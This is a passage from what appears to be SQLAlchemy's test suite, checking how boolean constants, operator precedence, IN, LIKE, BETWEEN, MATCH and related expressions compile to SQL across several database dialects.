c = column('x', Boolean)
self.assert_compile(
c.is_(true()),
"x IS true",
dialect=self._dialect(True)
)
def test_twelve(self):
c = column('x', Boolean)
# I don't have a solution for this one yet,
# other than adding some heavy-handed conditionals
# into compiler
self.assert_compile(
c.is_(true()),
"x IS 1",
dialect=self._dialect(False)
)
class ConjunctionTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""test interaction of and_()/or_() with boolean , null constants
"""
__dialect__ = default.DefaultDialect(supports_native_boolean=True)
def test_one(self):
self.assert_compile(~and_(true()), "false")
def test_two(self):
self.assert_compile(or_(~and_(true())), "false")
def test_three(self):
self.assert_compile(or_(and_()), "")
def test_four(self):
x = column('x')
self.assert_compile(
and_(or_(x == 5), or_(x == 7)),
"x = :x_1 AND x = :x_2")
def test_five(self):
x = column("x")
self.assert_compile(
and_(true()._ifnone(None), x == 7),
"x = :x_1"
)
def test_six(self):
x = column("x")
self.assert_compile(or_(true(), x == 7), "true")
self.assert_compile(or_(x == 7, true()), "true")
self.assert_compile(~or_(x == 7, true()), "false")
def test_six_pt_five(self):
x = column("x")
self.assert_compile(select([x]).where(or_(x == 7, true())),
"SELECT x WHERE true")
self.assert_compile(
select(
[x]).where(
or_(
x == 7,
true())),
"SELECT x WHERE 1 = 1",
dialect=default.DefaultDialect(
supports_native_boolean=False))
def test_seven(self):
x = column("x")
self.assert_compile(
and_(true(), x == 7, true(), x == 9),
"x = :x_1 AND x = :x_2")
def test_eight(self):
x = column("x")
self.assert_compile(
or_(false(), x == 7, false(), x == 9),
"x = :x_1 OR x = :x_2")
def test_nine(self):
x = column("x")
self.assert_compile(
and_(x == 7, x == 9, false(), x == 5),
"false"
)
self.assert_compile(
~and_(x == 7, x == 9, false(), x == 5),
"true"
)
def test_ten(self):
self.assert_compile(
and_(None, None),
"NULL AND NULL"
)
def test_eleven(self):
x = column("x")
self.assert_compile(
select([x]).where(None).where(None),
"SELECT x WHERE NULL AND NULL"
)
def test_twelve(self):
x = column("x")
self.assert_compile(
select([x]).where(and_(None, None)),
"SELECT x WHERE NULL AND NULL"
)
def test_thirteen(self):
x = column("x")
self.assert_compile(
select([x]).where(~and_(None, None)),
"SELECT x WHERE NOT (NULL AND NULL)"
)
def test_fourteen(self):
x = column("x")
self.assert_compile(
select([x]).where(~null()),
"SELECT x WHERE NOT NULL"
)
def test_constant_non_singleton(self):
is_not_(null(), null())
is_not_(false(), false())
is_not_(true(), true())
def test_constant_render_distinct(self):
self.assert_compile(
select([null(), null()]),
"SELECT NULL AS anon_1, NULL AS anon_2"
)
self.assert_compile(
select([true(), true()]),
"SELECT true AS anon_1, true AS anon_2"
)
self.assert_compile(
select([false(), false()]),
"SELECT false AS anon_1, false AS anon_2"
)
def test_is_true_literal(self):
c = column('x', Boolean)
self.assert_compile(
c.is_(True),
"x IS true"
)
def test_is_false_literal(self):
c = column('x', Boolean)
self.assert_compile(
c.is_(False),
"x IS false"
)
def test_and_false_literal_leading(self):
self.assert_compile(
and_(False, True),
"false"
)
self.assert_compile(
and_(False, False),
"false"
)
def test_and_true_literal_leading(self):
self.assert_compile(
and_(True, True),
"true"
)
self.assert_compile(
and_(True, False),
"false"
)
def test_or_false_literal_leading(self):
self.assert_compile(
or_(False, True),
"true"
)
self.assert_compile(
or_(False, False),
"false"
)
def test_or_true_literal_leading(self):
self.assert_compile(
or_(True, True),
"true"
)
self.assert_compile(
or_(True, False),
"true"
)
class OperatorPrecedenceTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
column('description', String),
)
table2 = table('op', column('field'))
def test_operator_precedence_1(self):
self.assert_compile(
self.table2.select((self.table2.c.field == 5) == None),
"SELECT op.field FROM op WHERE (op.field = :field_1) IS NULL")
def test_operator_precedence_2(self):
self.assert_compile(
self.table2.select(
(self.table2.c.field + 5) == self.table2.c.field),
"SELECT op.field FROM op WHERE op.field + :field_1 = op.field")
def test_operator_precedence_3(self):
self.assert_compile(
self.table2.select((self.table2.c.field + 5) * 6),
"SELECT op.field FROM op WHERE (op.field + :field_1) * :param_1")
def test_operator_precedence_4(self):
self.assert_compile(
self.table2.select(
(self.table2.c.field * 5) + 6),
"SELECT op.field FROM op WHERE op.field * :field_1 + :param_1")
def test_operator_precedence_5(self):
self.assert_compile(self.table2.select(
5 + self.table2.c.field.in_([5, 6])),
"SELECT op.field FROM op WHERE :param_1 + "
"(op.field IN (:field_1, :field_2))")
def test_operator_precedence_6(self):
self.assert_compile(self.table2.select(
(5 + self.table2.c.field).in_([5, 6])),
"SELECT op.field FROM op WHERE :field_1 + op.field "
"IN (:param_1, :param_2)")
def test_operator_precedence_7(self):
self.assert_compile(self.table2.select(
not_(and_(self.table2.c.field == 5,
self.table2.c.field == 7))),
"SELECT op.field FROM op WHERE NOT "
"(op.field = :field_1 AND op.field = :field_2)")
def test_operator_precedence_8(self):
self.assert_compile(
self.table2.select(
not_(
self.table2.c.field == 5)),
"SELECT op.field FROM op WHERE op.field != :field_1")
def test_operator_precedence_9(self):
self.assert_compile(self.table2.select(
not_(self.table2.c.field.between(5, 6))),
"SELECT op.field FROM op WHERE "
"op.field NOT BETWEEN :field_1 AND :field_2")
def test_operator_precedence_10(self):
self.assert_compile(
self.table2.select(
not_(
self.table2.c.field) == 5),
"SELECT op.field FROM op WHERE (NOT op.field) = :param_1")
def test_operator_precedence_11(self):
self.assert_compile(self.table2.select(
(self.table2.c.field == self.table2.c.field).
between(False, True)),
"SELECT op.field FROM op WHERE (op.field = op.field) "
"BETWEEN :param_1 AND :param_2")
def test_operator_precedence_12(self):
self.assert_compile(self.table2.select(
between((self.table2.c.field == self.table2.c.field),
False, True)),
"SELECT op.field FROM op WHERE (op.field = op.field) "
"BETWEEN :param_1 AND :param_2")
def test_operator_precedence_13(self):
self.assert_compile(
self.table2.select(
self.table2.c.field.match(
self.table2.c.field).is_(None)),
"SELECT op.field FROM op WHERE (op.field MATCH op.field) IS NULL")
def test_operator_precedence_collate_1(self):
self.assert_compile(
self.table1.c.name == literal('foo').collate('utf-8'),
"mytable.name = (:param_1 COLLATE utf-8)"
)
def test_operator_precedence_collate_2(self):
self.assert_compile(
(self.table1.c.name == literal('foo')).collate('utf-8'),
"mytable.name = :param_1 COLLATE utf-8"
)
def test_operator_precedence_collate_3(self):
self.assert_compile(
self.table1.c.name.collate('utf-8') == 'foo',
"(mytable.name COLLATE utf-8) = :param_1"
)
def test_operator_precedence_collate_4(self):
self.assert_compile(
and_(
(self.table1.c.name == literal('foo')).collate('utf-8'),
(self.table2.c.field == literal('bar')).collate('utf-8'),
),
"mytable.name = :param_1 COLLATE utf-8 "
"AND op.field = :param_2 COLLATE utf-8"
)
def test_operator_precedence_collate_5(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').desc()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 DESC"
)
def test_operator_precedence_collate_6(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').desc().nullslast()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 DESC NULLS LAST"
)
def test_operator_precedence_collate_7(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').asc()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 ASC"
)
def test_commutative_operators(self):
self.assert_compile(
literal("a") + literal("b") * literal("c"),
":param_1 || :param_2 * :param_3"
)
def test_op_operators(self):
self.assert_compile(
self.table1.select(self.table1.c.myid.op('hoho')(12) == 14),
"SELECT mytable.myid, mytable.name, mytable.description FROM "
"mytable WHERE (mytable.myid hoho :myid_1) = :param_1"
)
def test_op_operators_comma_precedence(self):
self.assert_compile(
func.foo(self.table1.c.myid.op('hoho')(12)),
"foo(mytable.myid hoho :myid_1)"
)
def test_op_operators_comparison_precedence(self):
self.assert_compile(
self.table1.c.myid.op('hoho')(12) == 5,
"(mytable.myid hoho :myid_1) = :param_1"
)
def test_op_operators_custom_precedence(self):
op1 = self.table1.c.myid.op('hoho', precedence=5)
op2 = op1(5).op('lala', precedence=4)(4)
op3 = op1(5).op('lala', precedence=6)(4)
self.assert_compile(op2, "mytable.myid hoho :myid_1 lala :param_1")
self.assert_compile(op3, "(mytable.myid hoho :myid_1) lala :param_1")
class OperatorAssociativityTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_associativity_1(self):
f = column('f')
self.assert_compile(f - f, "f - f")
def test_associativity_2(self):
f = column('f')
self.assert_compile(f - f - f, "(f - f) - f")
def test_associativity_3(self):
f = column('f')
self.assert_compile((f - f) - f, "(f - f) - f")
def test_associativity_4(self):
f = column('f')
self.assert_compile((f - f).label('foo') - f, "(f - f) - f")
def test_associativity_5(self):
f = column('f')
self.assert_compile(f - (f - f), "f - (f - f)")
def test_associativity_6(self):
f = column('f')
self.assert_compile(f - (f - f).label('foo'), "f - (f - f)")
def test_associativity_7(self):
f = column('f')
# because - less precedent than /
self.assert_compile(f / (f - f), "f / (f - f)")
def test_associativity_8(self):
f = column('f')
self.assert_compile(f / (f - f).label('foo'), "f / (f - f)")
def test_associativity_9(self):
f = column('f')
self.assert_compile(f / f - f, "f / f - f")
def test_associativity_10(self):
f = column('f')
self.assert_compile((f / f) - f, "f / f - f")
def test_associativity_11(self):
f = column('f')
self.assert_compile((f / f).label('foo') - f, "f / f - f")
def test_associativity_12(self):
f = column('f')
# because / more precedent than -
self.assert_compile(f - (f / f), "f - f / f")
def test_associativity_13(self):
f = column('f')
self.assert_compile(f - (f / f).label('foo'), "f - f / f")
def test_associativity_14(self):
f = column('f')
self.assert_compile(f - f / f, "f - f / f")
def test_associativity_15(self):
f = column('f')
self.assert_compile((f - f) / f, "(f - f) / f")
def test_associativity_16(self):
f = column('f')
self.assert_compile(((f - f) / f) - f, "(f - f) / f - f")
def test_associativity_17(self):
f = column('f')
# - lower precedence than /
self.assert_compile((f - f) / (f - f), "(f - f) / (f - f)")
def test_associativity_18(self):
f = column('f')
# / higher precedence than -
self.assert_compile((f / f) - (f / f), "f / f - f / f")
def test_associativity_19(self):
f = column('f')
self.assert_compile((f / f) - (f - f), "f / f - (f - f)")
def test_associativity_20(self):
f = column('f')
self.assert_compile((f / f) / (f - f), "(f / f) / (f - f)")
def test_associativity_21(self):
f = column('f')
self.assert_compile(f / (f / (f - f)), "f / (f / (f - f))")
class InTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
table2 = table(
'myothertable',
column('otherid', Integer),
column('othername', String)
)
def test_in_1(self):
self.assert_compile(self.table1.c.myid.in_(['a']),
"mytable.myid IN (:myid_1)")
def test_in_2(self):
self.assert_compile(~self.table1.c.myid.in_(['a']),
"mytable.myid NOT IN (:myid_1)")
def test_in_3(self):
self.assert_compile(self.table1.c.myid.in_(['a', 'b']),
"mytable.myid IN (:myid_1, :myid_2)")
def test_in_4(self):
self.assert_compile(self.table1.c.myid.in_(iter(['a', 'b'])),
"mytable.myid IN (:myid_1, :myid_2)")
def test_in_5(self):
self.assert_compile(self.table1.c.myid.in_([literal('a')]),
"mytable.myid IN (:param_1)")
def test_in_6(self):
self.assert_compile(self.table1.c.myid.in_([literal('a'), 'b']),
"mytable.myid IN (:param_1, :myid_1)")
def test_in_7(self):
self.assert_compile(
self.table1.c.myid.in_([literal('a'), literal('b')]),
"mytable.myid IN (:param_1, :param_2)")
def test_in_8(self):
self.assert_compile(self.table1.c.myid.in_(['a', literal('b')]),
"mytable.myid IN (:myid_1, :param_1)")
def test_in_9(self):
self.assert_compile(self.table1.c.myid.in_([literal(1) + 'a']),
"mytable.myid IN (:param_1 + :param_2)")
def test_in_10(self):
self.assert_compile(self.table1.c.myid.in_([literal('a') + 'a', 'b']),
"mytable.myid IN (:param_1 || :param_2, :myid_1)")
def test_in_11(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal('a') +
literal('a'),
literal('b')]),
"mytable.myid IN (:param_1 || :param_2, :param_3)")
def test_in_12(self):
self.assert_compile(self.table1.c.myid.in_([1, literal(3) + 4]),
"mytable.myid IN (:myid_1, :param_1 + :param_2)")
def test_in_13(self):
self.assert_compile(self.table1.c.myid.in_([literal('a') < 'b']),
"mytable.myid IN (:param_1 < :param_2)")
def test_in_14(self):
self.assert_compile(self.table1.c.myid.in_([self.table1.c.myid]),
"mytable.myid IN (mytable.myid)")
def test_in_15(self):
self.assert_compile(self.table1.c.myid.in_(['a', self.table1.c.myid]),
"mytable.myid IN (:myid_1, mytable.myid)")
def test_in_16(self):
self.assert_compile(self.table1.c.myid.in_([literal('a'),
self.table1.c.myid]),
"mytable.myid IN (:param_1, mytable.myid)")
def test_in_17(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal('a'),
self.table1.c.myid +
'a']),
"mytable.myid IN (:param_1, mytable.myid + :myid_1)")
def test_in_18(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal(1),
'a' +
self.table1.c.myid]),
"mytable.myid IN (:param_1, :myid_1 + mytable.myid)")
def test_in_19(self):
self.assert_compile(self.table1.c.myid.in_([1, 2, 3]),
"mytable.myid IN (:myid_1, :myid_2, :myid_3)")
def test_in_20(self):
self.assert_compile(self.table1.c.myid.in_(
select([self.table2.c.otherid])),
"mytable.myid IN (SELECT myothertable.otherid FROM myothertable)")
def test_in_21(self):
self.assert_compile(~self.table1.c.myid.in_(
select([self.table2.c.otherid])),
"mytable.myid NOT IN (SELECT myothertable.otherid FROM myothertable)")
def test_in_22(self):
self.assert_compile(
self.table1.c.myid.in_(
text("SELECT myothertable.otherid FROM myothertable")
),
"mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable)"
)
@testing.emits_warning('.*empty sequence.*')
def test_in_23(self):
self.assert_compile(self.table1.c.myid.in_([]),
"mytable.myid != mytable.myid")
def test_in_24(self):
self.assert_compile(
select([self.table1.c.myid.in_(select([self.table2.c.otherid]))]),
"SELECT mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable) AS anon_1 FROM mytable"
)
def test_in_25(self):
self.assert_compile(
select([self.table1.c.myid.in_(
select([self.table2.c.otherid]).as_scalar())]),
"SELECT mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable) AS anon_1 FROM mytable"
)
def test_in_26(self):
self.assert_compile(self.table1.c.myid.in_(
union(
select([self.table1.c.myid], self.table1.c.myid == 5),
select([self.table1.c.myid], self.table1.c.myid == 12),
)
), "mytable.myid IN ("
"SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1 "
"UNION SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_2)")
def test_in_27(self):
# test that putting a select in an IN clause does not
# blow away its ORDER BY clause
self.assert_compile(
select([self.table1, self.table2],
self.table2.c.otherid.in_(
select([self.table2.c.otherid],
order_by=[self.table2.c.othername],
limit=10, correlate=False)
),
from_obj=[self.table1.join(self.table2,
self.table1.c.myid == self.table2.c.otherid)],
order_by=[self.table1.c.myid]
),
"SELECT mytable.myid, "
"myothertable.otherid, myothertable.othername FROM mytable "
"JOIN myothertable ON mytable.myid = myothertable.otherid "
"WHERE myothertable.otherid IN (SELECT myothertable.otherid "
"FROM myothertable ORDER BY myothertable.othername "
"LIMIT :param_1) ORDER BY mytable.myid",
{'param_1': 10}
)
def test_in_28(self):
self.assert_compile(
self.table1.c.myid.in_([None]),
"mytable.myid IN (NULL)"
)
@testing.emits_warning('.*empty sequence.*')
def test_in_29(self):
self.assert_compile(self.table1.c.myid.notin_([]),
"mytable.myid = mytable.myid")
@testing.emits_warning('.*empty sequence.*')
def test_in_30(self):
self.assert_compile(~self.table1.c.myid.in_([]),
"mytable.myid = mytable.myid")
class MathOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
def _test_math_op(self, py_op, sql_op):
for (lhs, rhs, res) in (
(5, self.table1.c.myid, ':myid_1 %s mytable.myid'),
(5, literal(5), ':param_1 %s :param_2'),
(self.table1.c.myid, 'b', 'mytable.myid %s :myid_1'),
(self.table1.c.myid, literal(2.7), 'mytable.myid %s :param_1'),
(self.table1.c.myid, self.table1.c.myid,
'mytable.myid %s mytable.myid'),
(literal(5), 8, ':param_1 %s :param_2'),
(literal(6), self.table1.c.myid, ':param_1 %s mytable.myid'),
(literal(7), literal(5.5), ':param_1 %s :param_2'),
):
self.assert_compile(py_op(lhs, rhs), res % sql_op)
def test_math_op_add(self):
self._test_math_op(operator.add, '+')
def test_math_op_mul(self):
self._test_math_op(operator.mul, '*')
def test_math_op_sub(self):
self._test_math_op(operator.sub, '-')
def test_math_op_div(self):
if util.py3k:
self._test_math_op(operator.truediv, '/')
else:
self._test_math_op(operator.div, '/')
def test_math_op_mod(self):
self._test_math_op(operator.mod, '%')
class ComparisonOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
def test_pickle_operators_one(self):
clause = (self.table1.c.myid == 12) & \
self.table1.c.myid.between(15, 20) & \
self.table1.c.myid.like('hoho')
eq_(str(clause), str(util.pickle.loads(util.pickle.dumps(clause))))
def test_pickle_operators_two(self):
clause = tuple_(1, 2, 3)
eq_(str(clause), str(util.pickle.loads(util.pickle.dumps(clause))))
def _test_comparison_op(self, py_op, fwd_op, rev_op):
dt = datetime.datetime(2012, 5, 10, 15, 27, 18)
for (lhs, rhs, l_sql, r_sql) in (
('a', self.table1.c.myid, ':myid_1', 'mytable.myid'),
('a', literal('b'), ':param_2', ':param_1'), # note swap!
(self.table1.c.myid, 'b', 'mytable.myid', ':myid_1'),
(self.table1.c.myid, literal('b'), 'mytable.myid', ':param_1'),
(self.table1.c.myid, self.table1.c.myid,
'mytable.myid', 'mytable.myid'),
(literal('a'), 'b', ':param_1', ':param_2'),
(literal('a'), self.table1.c.myid, ':param_1', 'mytable.myid'),
(literal('a'), literal('b'), ':param_1', ':param_2'),
(dt, literal('b'), ':param_2', ':param_1'),
(literal('b'), dt, ':param_1', ':param_2'),
):
# the compiled clause should match either (e.g.):
# 'a' < 'b' -or- 'b' > 'a'.
compiled = str(py_op(lhs, rhs))
fwd_sql = "%s %s %s" % (l_sql, fwd_op, r_sql)
rev_sql = "%s %s %s" % (r_sql, rev_op, l_sql)
self.assert_(compiled == fwd_sql or compiled == rev_sql,
"\n'" + compiled + "'\n does not match\n'" +
fwd_sql + "'\n or\n'" + rev_sql + "'")
def test_comparison_operators_lt(self):
self._test_comparison_op(operator.lt, '<', '>'),
def test_comparison_operators_gt(self):
self._test_comparison_op(operator.gt, '>', '<')
def test_comparison_operators_eq(self):
self._test_comparison_op(operator.eq, '=', '=')
def test_comparison_operators_ne(self):
self._test_comparison_op(operator.ne, '!=', '!=')
def test_comparison_operators_le(self):
self._test_comparison_op(operator.le, '<=', '>=')
def test_comparison_operators_ge(self):
self._test_comparison_op(operator.ge, '>=', '<=')
class NonZeroTest(fixtures.TestBase):
def _raises(self, expr):
assert_raises_message(
TypeError,
"Boolean value of this clause is not defined",
bool, expr
)
def _assert_true(self, expr):
is_(bool(expr), True)
def _assert_false(self, expr):
is_(bool(expr), False)
def test_column_identity_eq(self):
c1 = column('c1')
self._assert_true(c1 == c1)
def test_column_identity_gt(self):
c1 = column('c1')
self._raises(c1 > c1)
def test_column_compare_eq(self):
c1, c2 = column('c1'), column('c2')
self._assert_false(c1 == c2)
def test_column_compare_gt(self):
c1, c2 = column('c1'), column('c2')
self._raises(c1 > c2)
def test_binary_identity_eq(self):
c1 = column('c1')
expr = c1 > 5
self._assert_true(expr == expr)
def test_labeled_binary_identity_eq(self):
c1 = column('c1')
expr = (c1 > 5).label(None)
self._assert_true(expr == expr)
def test_annotated_binary_identity_eq(self):
c1 = column('c1')
expr1 = (c1 > 5)
expr2 = expr1._annotate({"foo": "bar"})
self._assert_true(expr1 == expr2)
def test_labeled_binary_compare_gt(self):
c1 = column('c1')
expr1 = (c1 > 5).label(None)
expr2 = (c1 > 5).label(None)
self._assert_false(expr1 == expr2)
class NegationTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_negate_operators_1(self):
for (py_op, op) in (
(operator.neg, '-'),
(operator.inv, 'NOT '),
):
for expr, expected in (
(self.table1.c.myid, "mytable.myid"),
(literal("foo"), ":param_1"),
):
self.assert_compile(py_op(expr), "%s%s" % (op, expected))
def test_negate_operators_2(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~(self.table1.c.name == 'john')),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 "
"AND mytable.name != :name_1"
)
def test_negate_operators_3(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~(self.table1.c.name.between('jack', 'john'))),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND "
"mytable.name NOT BETWEEN :name_1 AND :name_2"
)
def test_negate_operators_4(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~and_(self.table1.c.name == 'john',
self.table1.c.name == 'ed',
self.table1.c.name == 'fred')),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND "
"NOT (mytable.name = :name_1 AND mytable.name = :name_2 "
"AND mytable.name = :name_3)"
)
def test_negate_operators_5(self):
self.assert_compile(
self.table1.select(
(self.table1.c.myid != 12) & ~self.table1.c.name),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND NOT mytable.name")
class LikeTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_like_1(self):
self.assert_compile(
self.table1.c.myid.like('somstr'),
"mytable.myid LIKE :myid_1")
def test_like_2(self):
self.assert_compile(
~self.table1.c.myid.like('somstr'),
"mytable.myid NOT LIKE :myid_1")
def test_like_3(self):
self.assert_compile(
self.table1.c.myid.like('somstr', escape='\\'),
"mytable.myid LIKE :myid_1 ESCAPE '\\'")
def test_like_4(self):
self.assert_compile(
~self.table1.c.myid.like('somstr', escape='\\'),
"mytable.myid NOT LIKE :myid_1 ESCAPE '\\'")
def test_like_5(self):
self.assert_compile(
self.table1.c.myid.ilike('somstr', escape='\\'),
"lower(mytable.myid) LIKE lower(:myid_1) ESCAPE '\\'")
def test_like_6(self):
self.assert_compile(
~self.table1.c.myid.ilike('somstr', escape='\\'),
"lower(mytable.myid) NOT LIKE lower(:myid_1) ESCAPE '\\'")
def test_like_7(self):
self.assert_compile(
self.table1.c.myid.ilike('somstr', escape='\\'),
"mytable.myid ILIKE %(myid_1)s ESCAPE '\\\\'",
dialect=postgresql.dialect())
def test_like_8(self):
self.assert_compile(
~self.table1.c.myid.ilike('somstr', escape='\\'),
"mytable.myid NOT ILIKE %(myid_1)s ESCAPE '\\\\'",
dialect=postgresql.dialect())
def test_like_9(self):
self.assert_compile(
self.table1.c.name.ilike('%something%'),
"lower(mytable.name) LIKE lower(:name_1)")
def test_like_10(self):
self.assert_compile(
self.table1.c.name.ilike('%something%'),
"mytable.name ILIKE %(name_1)s",
dialect=postgresql.dialect())
def test_like_11(self):
self.assert_compile(
~self.table1.c.name.ilike('%something%'),
"lower(mytable.name) NOT LIKE lower(:name_1)")
def test_like_12(self):
self.assert_compile(
~self.table1.c.name.ilike('%something%'),
"mytable.name NOT ILIKE %(name_1)s",
dialect=postgresql.dialect())
class BetweenTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_between_1(self):
self.assert_compile(
self.table1.c.myid.between(1, 2),
"mytable.myid BETWEEN :myid_1 AND :myid_2")
def test_between_2(self):
self.assert_compile(
~self.table1.c.myid.between(1, 2),
"mytable.myid NOT BETWEEN :myid_1 AND :myid_2")
def test_between_3(self):
self.assert_compile(
self.table1.c.myid.between(1, 2, symmetric=True),
"mytable.myid BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_4(self):
self.assert_compile(
~self.table1.c.myid.between(1, 2, symmetric=True),
"mytable.myid NOT BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_5(self):
self.assert_compile(
between(self.table1.c.myid, 1, 2, symmetric=True),
"mytable.myid BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_6(self):
self.assert_compile(
~between(self.table1.c.myid, 1, 2, symmetric=True),
"mytable.myid NOT BETWEEN SYMMETRIC :myid_1 AND :myid_2")
class MatchTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_match_1(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"mytable.myid MATCH ?",
dialect=sqlite.dialect())
def test_match_2(self):
self.assert_compile(
self.table1.c.myid.match('somstr'),
"MATCH (mytable.myid) AGAINST (%s IN BOOLEAN MODE)",
dialect=mysql.dialect())
def test_match_3(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"CONTAINS (mytable.myid, :myid_1)",
dialect=mssql.dialect())
def test_match_4(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"mytable.myid @@ to_tsquery(%(myid_1)s)",
dialect=postgresql.dialect())
def test_match_5(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"CONTAINS (mytable.myid, :myid_1)",
dialect=oracle.dialect())
def test_match_is_now_matchtype(self):
expr = self.table1.c.myid.match('somstr')
assert expr.type._type_affinity is MatchType()._type_affinity
assert isinstance(expr.type, MatchType)
def test_boolean_inversion_postgresql(self):
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT mytable.myid @@ to_tsquery(%(myid_1)s)",
dialect=postgresql.dialect())
def test_boolean_inversion_mysql(self):
# because mysql doesnt have native boolean
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT MATCH (mytable.myid) AGAINST (%s IN BOOLEAN MODE)",
dialect=mysql.dialect())
def test_boolean_inversion_mssql(self):
# because mssql doesnt have native boolean
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT CONTAINS (mytable.myid, :myid_1)",
dialect=mssql.dialect())
class ComposedLikeOperatorsTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_contains(self):
self.assert_compile(
column('x').contains('y'),
"x LIKE '%%' || :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_contains_escape(self):
self.assert_compile(
column('x').contains('y', escape='\\'),
"x LIKE '%%' || :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_contains_literal(self):
self.assert_compile(
column('x').contains(literal_column('y')),
"x LIKE '%%' || y || '%%'",
checkparams={}
)
def test_contains_text(self):
self.assert_compile(
column('x').contains(text('y')),
"x LIKE '%%' || y || '%%'",
checkparams={}
)
def test_not_contains(self):
self.assert_compile(
~column('x').contains('y'),
"x NOT LIKE '%%' || :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_not_contains_escape(self):
self.assert_compile(
~column('x').contains('y', escape='\\'),
"x NOT LIKE '%%' || :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_contains_concat(self):
self.assert_compile(
column('x').contains('y'),
"x LIKE concat(concat('%%', %s), '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_contains_concat(self):
self.assert_compile(
~column('x').contains('y'),
"x NOT LIKE concat(concat('%%', %s), '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_contains_literal_concat(self):
self.assert_compile(
column('x').contains(literal_column('y')),
"x LIKE concat(concat('%%', y), '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_contains_text_concat(self):
self.assert_compile(
column('x').contains(text('y')),
"x LIKE concat(concat('%%', y), '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_startswith(self):
self.assert_compile(
column('x').startswith('y'),
"x LIKE :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_startswith_escape(self):
self.assert_compile(
column('x').startswith('y', escape='\\'),
"x LIKE :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_not_startswith(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT LIKE :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_not_startswith_escape(self):
self.assert_compile(
~column('x').startswith('y', escape='\\'),
"x NOT LIKE :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_startswith_literal(self):
self.assert_compile(
column('x').startswith(literal_column('y')),
"x LIKE y || '%%'",
checkparams={}
)
def test_startswith_text(self):
self.assert_compile(
column('x').startswith(text('y')),
"x LIKE y || '%%'",
checkparams={}
)
def test_startswith_concat(self):
self.assert_compile(
column('x').startswith('y'),
"x LIKE concat(%s, '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_startswith_concat(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT LIKE concat(%s, '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_startswith_firebird(self):
self.assert_compile(
column('x').startswith('y'),
"x STARTING WITH :x_1",
checkparams={'x_1': 'y'},
dialect=firebird.dialect()
)
def test_not_startswith_firebird(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT STARTING WITH :x_1",
checkparams={'x_1': 'y'},
dialect=firebird.dialect()
)
def test_startswith_literal_mysql(self):
self.assert_compile(
column('x').startswith(literal_column('y')),
"x LIKE concat(y, '%%')",
checkparams={},
